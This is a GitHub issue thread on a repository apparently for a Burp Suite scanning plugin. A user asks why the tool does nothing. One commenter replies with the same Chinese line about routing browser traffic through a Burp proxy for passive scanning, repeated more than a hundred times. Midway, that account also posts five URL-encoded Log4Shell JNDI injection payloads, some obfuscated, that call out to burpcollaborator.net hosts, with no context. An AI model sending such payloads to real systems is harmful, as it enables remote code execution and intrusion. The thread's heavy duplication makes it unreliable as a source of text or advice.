### ISSUE TITLE
师傅您好，运行了没有反应是什么情况，求解😭

### ISSUE THREAD

**Issue by xiao-maqiang** [depycode/burpsuite_hack#20]
![桌面4](https://user-images.githubusercontent.com/83712127/231326124-290880ac-ba9c-425d-a388-59ada07ad311.png)
![桌面3](https://user-images.githubusercontent.com/83712127/231326278-c7ce699e-156b-49be-bf53-845943f17c59.png)
![桌面2](https://user-images.githubusercontent.com/83712127/231326304-ff432ba2-b1dd-41b8-a1ee-422519959297.png)
![桌面1](https://user-images.githubusercontent.com/83712127/231326315-093f5edd-27cd-4253-9e72-4e8f49d06242.png)

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
$%7bjndi%3aldap%3a//el3ho1og01280cdo4wjri79h98f75zto.burpcollaborator.net/ctTBL%7d

**Comment by evi1hack** [comment]
$%7b$%7bEmnc%3asShS%3aGCnQm%3aKgyJI%3auLqWWy%3a-j%7d$%7bphFxk%3aPkboIQ%3aNLziqt%3a-n%7dd$%7bkpuV%3aCdqO%3anau%3aRIAi%3a-i%7d%3a$%7bxVoI%3aGgRd%3abGLfCi%3a-l%7dda$%7bTBP%3adUN%3aAVEOJ%3aXQoc%3a-p%7d%3a//rytu1e1tdefldpq1h9w4vkmumlskig65.burpcollaborator.net/tVqsh%7d

**Comment by evi1hack** [comment]
$%7bjndi%3aldap%3a//o7wrabaqmboimmzyq6514hvrvi1hrhf6.burpcollaborator.net/+hcQvC%7d

**Comment by evi1hack** [comment]
$%7bjndi%3armi%3a//xde0gkgzskursv57wfbaaq101r7qxvlk.burpcollaborator.net%7d

**Comment by evi1hack** [comment]
$%7b$%7bkgyv%3aaJn%3a-j%7d$%7bVzkv%3aXEcR%3ajxHW%3a-n%7d$%7bNdU%3aLJaVg%3a-d%7di%3a$%7bNSzEgL%3aKsAtf%3a-r%7d$%7bQDBtD%3aHPi%3azGpoWc%3aBhj%3a-m%7d$%7bmCfYTf%3aVJQj%3a-i%7d%3a//c6jf9z9elzn6laympu4p35ufu605r1fq.burpcollaborator.net/zCiNG%7d

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。

**Comment by evi1hack** [comment]
浏览器挂burp代理， 访问需要被测试的网站，让流量过burp ，这个是被动扫描不是主动扫描。
